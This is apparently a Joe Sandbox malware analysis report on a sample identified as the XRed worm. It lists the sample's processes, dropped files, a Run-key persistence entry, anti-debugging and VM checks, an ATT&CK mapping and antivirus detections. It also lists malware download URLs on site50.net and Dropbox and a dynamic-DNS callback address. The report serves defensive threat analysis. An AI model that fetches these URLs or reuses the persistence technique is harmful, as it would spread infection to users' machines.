Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe

Dropped PE file which has not been started: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\wixstdba.dll

Jump to dropped file

Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\._cache_file.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\._cache_file.exe

API coverage: 9.9 %

Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 1908

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000CFDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 000CFE5Dh	1_2_000CFDC2
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000CFDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 000CFE56h	1_2_000CFDC2
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006CFDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 006CFE5Dh	2_2_006CFDC2
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006CFDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 006CFE56h	2_2_006CFDC2

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000D4315 FindFirstFileW,FindClose,	1_2_000D4315
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000A993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	1_2_000A993E
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_00093BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	1_2_00093BC3
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006D4315 FindFirstFileW,FindClose,	2_2_006D4315
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006A993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	2_2_006A993E
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_00693BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	2_2_00693BC3
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8D65CB FindFirstFileW,FindClose,	2_2_6C8D65CB

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000D962D VirtualQuery,GetSystemInfo,

1_2_000D962D

Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000			Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: file.exe, 00000000.00000003.1743203350.0000000001415000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.1743203350.0000000001415000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Synaptics.exe, 00000003.00000002.3580003421.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3580003421.0000000000651000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\._cache_file.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	API call chain: ExitProcess graph end node

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000BE625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_000BE625

Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe

Code function: 2_2_6C8D1C04 LoadLibraryW,GetProcAddress,GetLastError,FreeLibrary,

2_2_6C8D1C04

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000C4812 mov eax, dword ptr fs:[00000030h]	1_2_000C4812
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006C4812 mov eax, dword ptr fs:[00000030h]	2_2_006C4812
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8E3C07 mov eax, dword ptr fs:[00000030h]	2_2_6C8E3C07

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000938D4 GetProcessHeap,RtlAllocateHeap,

1_2_000938D4

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000BE188 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_000BE188
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000BE625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_000BE625
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000BE773 SetUnhandledExceptionFilter,	1_2_000BE773
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000C3BB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_000C3BB0
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006BE188 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_006BE188
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006BE625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_006BE625
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006BE773 SetUnhandledExceptionFilter,	2_2_006BE773
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006C3BB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_006C3BB0
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8DEC77 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C8DEC77
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8DE730 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6C8DE730
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8E09E7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C8E09E7

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior
Source: C:\Users\user\Desktop\._cache_file.exe	Process created: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe "C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe" -burn.clean.room="C:\Users\user\Desktop\._cache_file.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572	Jump to behavior

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000D15CB InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,

1_2_000D15CB

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000D393B AllocateAndInitializeSid,CheckTokenMembership,

1_2_000D393B

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000BE9A7 cpuid

1_2_000BE9A7

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe

Queries volume information: C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\logo.png VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000A4CE8 ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,

1_2_000A4CE8

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000BE513 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_000BE513

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000960BA GetUserNameW,GetLastError,

1_2_000960BA

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000D8733 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,

1_2_000D8733

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_0009508D GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,

1_2_0009508D

Stealing of Sensitive Information

Yara detected XRed

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1707797883.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6800, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX1D61.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Remote Access Functionality

Yara detected XRed

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1707797883.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6800, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX1D61.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	41 Scripting	1 Replication Through Removable Media	2 Native API	41 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 DLL Side-Loading	1 Extra Window Memory Injection	2 Obfuscated Files or Information	LSASS Memory	1 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	1 Windows Service	1 Access Token Manipulation	1 DLL Side-Loading	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Windows Service	1 Extra Window Memory Injection	NTDS	4 File and Directory Discovery	Distributed Component Object Model	Input Capture	34 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	22 Masquerading	LSA Secrets	35 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	11 Virtualization/Sandbox Evasion	Cached Domain Credentials	121 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	11 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	87%	ReversingLabs	Win32.Worm.Zorex
file.exe	100%	Avira	WORM/Delphi.Gen
file.exe	100%	Avira	W2000M/Dldr.Agent.17651006
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Synaptics\RCX1D61.tmp	100%	Avira	TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\RCX1D61.tmp	100%	Avira	W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	WORM/Delphi.Gen
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	W2000M/Dldr.Agent.17651006
C:\Users\user\Documents\DVWHKMNFNN\~$cache1	100%	Avira	TR/Dldr.Agent.SH
C:\Users\user\Documents\DVWHKMNFNN\~$cache1	100%	Avira	W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\RCX1D61.tmp	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\Synaptics.exe	100%	Joe Sandbox ML
C:\Users\user\Documents\DVWHKMNFNN\~$cache1	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\RCX1D61.tmp	92%	ReversingLabs	Win32.Worm.Zorex
C:\ProgramData\Synaptics\Synaptics.exe	87%	ReversingLabs	Win32.Worm.Zorex
C:\Users\user\Desktop\._cache_file.exe	0%	ReversingLabs
C:\Users\user\Documents\DVWHKMNFNN\~$cache1	92%	ReversingLabs	Win32.Worm.Zorex
C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\wixstdba.dll	0%	ReversingLabs
C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://xred.site50.net/syn/SUpdate.iniZ	100%	Avira URL Cloud	malware
http://xred.site50.net/syn/SSLLibrary.dlp	100%	Avira URL Cloud	malware
http://xred.site50.net/syn/SSLLibrary.dll6	100%	Avira URL Cloud	malware
http://xred.site50.net/syn/Synaptics.rarZ	100%	Avira URL Cloud	malware
http://xred.site50.net/syn/SUpdate.iniH)	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
freedns.afraid.org	69.42.215.252	true	false	high
docs.google.com	216.58.212.174	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
drive.usercontent.google.com	142.250.185.65	true	false	high
xred.mooo.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
xred.mooo.com	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978scrC	Synaptics.exe, 00000003.00000002.3580003421.00000000005FB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/Synaptics.rarZ	Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1	~$cache1.3.dr	false		high
http://wixtoolset.org/schemas/thmutil/2010	._cache_file.exe, 00000002.00000002.3581343704.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, ._cache_file.exe, 00000002.00000002.3581074590.00000000027E0000.00000004.00000020.00020000.00000000.sdmp, thm.xml.2.dr	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978c;	Synaptics.exe, 00000003.00000002.3580003421.00000000005CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:	Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	Synaptics.exe, 00000003.00000002.3580003421.000000000068F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2428484237.000000000068F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/Synaptics.rar	~$cache1.3.dr	false		high
http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor	file.exe, ._cache_file.exe.0.dr, ._cache_file.exe.1.dr, Synaptics.exe.0.dr	false		high
https://docs.google.com/user	Synaptics.exe, 00000003.00000002.3580003421.00000000005FB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/	Synaptics.exe, 00000003.00000002.3580003421.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3580003421.000000000063A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3580003421.000000000068F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dll6	Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:	Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1	~$cache1.3.dr	false		high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1	~DFC577DADA6953CA4C.TMP.4.dr	false		high
http://xred.site50.net/syn/SUpdate.iniZ	Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8	file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SUpdate.ini	~$cache1.3.dr	false		high
http://xred.site50.net/syn/SSLLibrary.dlp	file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16	Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SUpdate.iniH)	file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://xred.site50.net/syn/SSLLibrary.dll	~$cache1.3.dr	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl	file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	false		high
http://appsyndication.org/2006/appsyn	._cache_file.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
216.58.212.174	docs.google.com	United States	15169	GOOGLEUS	false
69.42.215.252	freedns.afraid.org	United States	17048	AWKNET-LLCUS	false
142.250.185.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583479
Start date and time:	2025-01-02 20:39:36 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal70.troj.expl.winEXE@11/46@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 129 Number of non-executed functions: 256
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 184.28.90.27, 20.189.173.27, 20.190.159.23, 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedscolprdwus21.westus.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
19:40:33	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
69.42.215.252	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
